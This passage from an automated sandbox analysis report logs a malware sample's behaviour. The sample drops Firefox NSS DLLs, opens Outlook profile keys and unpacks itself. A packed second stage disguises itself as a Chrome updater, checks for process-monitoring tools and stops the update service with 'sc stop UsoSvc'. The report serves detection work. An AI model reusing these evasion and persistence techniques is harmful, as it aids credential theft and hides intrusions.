                    Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\ProgramData\GDBFCGIIIJ.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wersvc.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: windowsperformancerecordercontrol.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: weretw.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wer.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: faultrep.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dbghelp.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: dbgcore.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: wer.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dll
                    Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dll
                    Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\wusa.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
                    Source: C:\ProgramData\Google\Chrome\updater.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                    Source: Binary string: mozglue.pdbP source: WGo3ga1AL9.exe, 00000000.00000002.2333118552.000000006F8ED000.00000002.00000001.01000000.00000010.sdmp
                    Source: Binary string: nss3.pdb@ source: WGo3ga1AL9.exe, 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmp
                    Source: Binary string: my_library.pdbU source: WGo3ga1AL9.exe, 00000000.00000003.1681252718.0000000002500000.00000004.00001000.00020000.00000000.sdmp, WGo3ga1AL9.exe, 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, WGo3ga1AL9.exe, 00000000.00000002.2314046088.0000000002420000.00000040.00001000.00020000.00000000.sdmp, WGo3ga1AL9.exe, 00000000.00000002.2332846243.000000006D011000.00000002.00000001.01000000.00000007.sdmp
                    Source: Binary string: my_library.pdb source: WGo3ga1AL9.exe, WGo3ga1AL9.exe, 00000000.00000003.1681252718.0000000002500000.00000004.00001000.00020000.00000000.sdmp, WGo3ga1AL9.exe, 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, WGo3ga1AL9.exe, 00000000.00000002.2314046088.0000000002420000.00000040.00001000.00020000.00000000.sdmp, WGo3ga1AL9.exe, 00000000.00000002.2332846243.000000006D011000.00000002.00000001.01000000.00000007.sdmp
                    Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb! source: GDBFCGIIIJ.exe, 00000009.00000002.2168579603.00007FF7743C2000.00000040.00000001.01000000.00000011.sdmp, updater.exe, 0000002D.00000002.2181872762.00007FF67DE52000.00000040.00000001.01000000.00000013.sdmp
                    Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb source: GDBFCGIIIJ.exe, 00000009.00000002.2168579603.00007FF7743C2000.00000040.00000001.01000000.00000011.sdmp, updater.exe, 0000002D.00000002.2181872762.00007FF67DE52000.00000040.00000001.01000000.00000013.sdmp
                    Source: Binary string: nss3.pdb source: WGo3ga1AL9.exe, 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmp
                    Source: Binary string: mozglue.pdb source: WGo3ga1AL9.exe, 00000000.00000002.2333118552.000000006F8ED000.00000002.00000001.01000000.00000010.sdmp

                    Data Obfuscation

                    barindex
                    Detected unpacking (changes PE section rights)
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeUnpacked PE file: 0.2.WGo3ga1AL9.exe.400000.0.unpack .text:ER;.data:W;.noramix:R;.rusovox:R;.rsrc:R;.reloc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
                    Detected unpacking (overwrites its own PE header)
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeUnpacked PE file: 0.2.WGo3ga1AL9.exe.400000.0.unpack
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_0040A090 LoadLibraryA,GetProcAddress,GetProcAddress,FreeLibrary,0_2_0040A090
                    Source: initial sampleStatic PE information: section where entry point is pointing to: .boot
                    Source: WGo3ga1AL9.exeStatic PE information: section name: .noramix
                    Source: WGo3ga1AL9.exeStatic PE information: section name: .rusovox
                    Source: freebl3.dll.0.drStatic PE information: section name: .00cfg
                    Source: freebl3[1].dll.0.drStatic PE information: section name: .00cfg
                    Source: mozglue.dll.0.drStatic PE information: section name: .00cfg
                    Source: mozglue[1].dll.0.drStatic PE information: section name: .00cfg
                    Source: msvcp140.dll.0.drStatic PE information: section name: .didat
                    Source: msvcp140[1].dll.0.drStatic PE information: section name: .didat
                    Source: nss3.dll.0.drStatic PE information: section name: .00cfg
                    Source: nss3[1].dll.0.drStatic PE information: section name: .00cfg
                    Source: softokn3.dll.0.drStatic PE information: section name: .00cfg
                    Source: softokn3[1].dll.0.drStatic PE information: section name: .00cfg
                    Source: GDBFCGIIIJ.exe.0.drStatic PE information: section name:
                    Source: GDBFCGIIIJ.exe.0.drStatic PE information: section name:
                    Source: GDBFCGIIIJ.exe.0.drStatic PE information: section name:
                    Source: GDBFCGIIIJ.exe.0.drStatic PE information: section name:
                    Source: GDBFCGIIIJ.exe.0.drStatic PE information: section name:
                    Source: GDBFCGIIIJ.exe.0.drStatic PE information: section name:
                    Source: GDBFCGIIIJ.exe.0.drStatic PE information: section name:
                    Source: GDBFCGIIIJ.exe.0.drStatic PE information: section name:
                    Source: GDBFCGIIIJ.exe.0.drStatic PE information: section name: .imports
                    Source: GDBFCGIIIJ.exe.0.drStatic PE information: section name: .themida
                    Source: GDBFCGIIIJ.exe.0.drStatic PE information: section name: .boot
                    Source: chrome_131[1].exe.0.drStatic PE information: section name:
                    Source: chrome_131[1].exe.0.drStatic PE information: section name:
                    Source: chrome_131[1].exe.0.drStatic PE information: section name:
                    Source: chrome_131[1].exe.0.drStatic PE information: section name:
                    Source: chrome_131[1].exe.0.drStatic PE information: section name:
                    Source: chrome_131[1].exe.0.drStatic PE information: section name:
                    Source: chrome_131[1].exe.0.drStatic PE information: section name:
                    Source: chrome_131[1].exe.0.drStatic PE information: section name:
                    Source: chrome_131[1].exe.0.drStatic PE information: section name: .imports
                    Source: chrome_131[1].exe.0.drStatic PE information: section name: .themida
                    Source: chrome_131[1].exe.0.drStatic PE information: section name: .boot
                    Source: updater.exe.9.drStatic PE information: section name:
                    Source: updater.exe.9.drStatic PE information: section name:
                    Source: updater.exe.9.drStatic PE information: section name:
                    Source: updater.exe.9.drStatic PE information: section name:
                    Source: updater.exe.9.drStatic PE information: section name:
                    Source: updater.exe.9.drStatic PE information: section name:
                    Source: updater.exe.9.drStatic PE information: section name:
                    Source: updater.exe.9.drStatic PE information: section name:
                    Source: updater.exe.9.drStatic PE information: section name: .imports
                    Source: updater.exe.9.drStatic PE information: section name: .themida
                    Source: updater.exe.9.drStatic PE information: section name: .boot
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_0041B335 push ecx; ret 0_2_0041B348
                    Source: WGo3ga1AL9.exeStatic PE information: section name: .text entropy: 7.621591774129554
                    Source: GDBFCGIIIJ.exe.0.drStatic PE information: section name: entropy: 7.966483454841862
                    Source: chrome_131[1].exe.0.drStatic PE information: section name: entropy: 7.966483454841862
                    Source: updater.exe.9.drStatic PE information: section name: entropy: 7.966483454841862
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                    Source: C:\ProgramData\GDBFCGIIIJ.exeFile created: C:\ProgramData\Google\Chrome\updater.exeJump to dropped file
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeFile created: C:\ProgramData\chrome.dllJump to dropped file
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dllJump to dropped file
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcp140[1].dllJump to dropped file
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dllJump to dropped file
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeFile created: C:\ProgramData\GDBFCGIIIJ.exeJump to dropped file
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nss3[1].dllJump to dropped file
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dllJump to dropped file
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\softokn3[1].dllJump to dropped file
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\chrome_131[1].exeJump to dropped file
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                    Source: C:\ProgramData\GDBFCGIIIJ.exeFile created: C:\ProgramData\Google\Chrome\updater.exeJump to dropped file
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeFile created: C:\ProgramData\chrome.dllJump to dropped file
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeFile created: C:\ProgramData\GDBFCGIIIJ.exeJump to dropped file
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file

                    Boot Survival

                    barindex
                    Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                    Source: C:\ProgramData\GDBFCGIIIJ.exeWindow searched: window name: RegmonClassJump to behavior
                    Source: C:\ProgramData\GDBFCGIIIJ.exeWindow searched: window name: FilemonClassJump to behavior
                    Source: C:\ProgramData\GDBFCGIIIJ.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\ProgramData\GDBFCGIIIJ.exeWindow searched: window name: RegmonclassJump to behavior
                    Source: C:\ProgramData\GDBFCGIIIJ.exeWindow searched: window name: FilemonclassJump to behavior
                    Source: C:\ProgramData\GDBFCGIIIJ.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                    Source: C:\ProgramData\Google\Chrome\updater.exeWindow searched: window name: RegmonClass
                    Source: C:\ProgramData\Google\Chrome\updater.exeWindow searched: window name: FilemonClass
                    Source: C:\ProgramData\Google\Chrome\updater.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                    Source: C:\ProgramData\GDBFCGIIIJ.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Loading BitLocker PowerShell Module
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeCode function: 0_2_00419F20 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00419F20
                    Source: C:\Users\user\Desktop\WGo3ga1AL9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
